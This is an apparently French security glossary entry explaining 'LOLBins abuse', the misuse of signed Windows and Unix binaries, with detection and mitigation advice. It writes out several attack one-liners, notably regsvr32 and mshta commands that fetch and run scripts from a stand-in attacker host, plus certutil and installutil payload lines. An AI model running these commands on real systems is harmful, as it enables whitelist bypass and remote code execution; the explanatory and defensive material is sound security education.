LOLBins Abuse
hackingDéfinition
LOLBins Abuse (Living Off the Land Binaries Abuse) désigne l'utilisation détournée de binaires, scripts et bibliothèques légitimes fournis avec le système d'exploitation Windows (ou d'autres OS) pour effectuer des actions malveillantes sans avoir à introduire des outils externes. La technique tire son nom du concept de 'vivre aux dépens du pays' : l'attaquant utilise les ressources déjà présentes sur le terrain.
Le projet LOLBAS (lolbas-project.github.io) documente plus de 150 binaires Windows légitimes avec leurs utilisations offensives : download de fichiers (certutil.exe, bitsadmin.exe, mshta.exe, powershell.exe, wget.exe natif), exécution de code arbitraire (regsvr32.exe, mshta.exe, wmic.exe, cmstp.exe, rundll32.exe), contournement de liste blanche d'applications (installutil.exe, regsvcs.exe, mavinject.exe, ieexec.exe), et encode/decode de données (certutil.exe -encode/-decode).
Des exemples emblématiques : certutil.exe -decode payload.b64 payload.exe télécharge et décode un payload depuis une chaîne base64, regsvr32.exe /s /n /u /i:http://attaquant.com/file.sct scrobj.dll exécute un script COM depuis une URL distante (technique Squiblydoo), mshta.exe http://attaquant.com/file.hta exécute un HTA (HTML Application) arbitraire, et installutil.exe /logfile= /logtoconsole=false /u payload.exe exécute du code .NET arbitraire.
Sur Linux, le projet GTFOBins documente des utilisations similaires pour des binaires Unix (find, awk, python, perl, ruby, bash, etc.) pour l'escalade de privilèges, la persistance, et l'exfiltration. Ces binaires sont souvent accessibles avec des permissions sudo ou SUID.
L'efficacité des LOLBins réside dans leur légitimité : ils sont signés par Microsoft, présents dans C:\Windows\System32, et inclus dans les listes blanches d'applications (AppLocker, WDAC). Bloquer ou alerter sur leur utilisation nécessite une analyse du contexte (arguments, processus parent) plutôt que de leur simple présence.
Fonctionnement
Squiblydoo (regsvr32 bypass) : regsvr32 /s /n /u /i:http://attaquant.com/payload.sct scrobj.dll contourne AppLocker (regsvr32.exe est signé Microsoft, dans la liste blanche). Le SCT (scriptlet) est un fichier XML contenant du JScript/VBScript exécuté par scrobj.dll. Le script peut télécharger et exécuter un payload arbitraire. Détection : surveiller regsvr32.exe avec des arguments réseau (http://, //)
Exploitation offensive
Les LOLBins sont particulièrement utiles dans les environnements avec AppLocker ou Windows Defender Application Control (WDAC) qui bloquent les binaires non signés. En utilisant uniquement des binaires Microsoft signés, les attaquants contournent ces restrictions. Des chaînes complexes (certutil pour download → wmic pour exécution → mshta pour persistence) permettent des opérations complètes sans aucun binaire externe.
Détection et mitigation
La détection des LOLBins abuse nécessite une surveillance contextuelle des arguments et du processus parent : un regsvr32.exe avec des arguments URL, un certutil.exe exécuté depuis un script Office, ou un mshta.exe exécuté depuis PowerShell sont des indicateurs forts. Microsoft Defender for Endpoint et les SIEM avec des règles comportementales (Sigma rules sur LOLBAS) sont efficaces. WDAC en mode 'Allow Microsoft' bloque la plupart des LOLBins non dans la liste des allowed publishers.
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h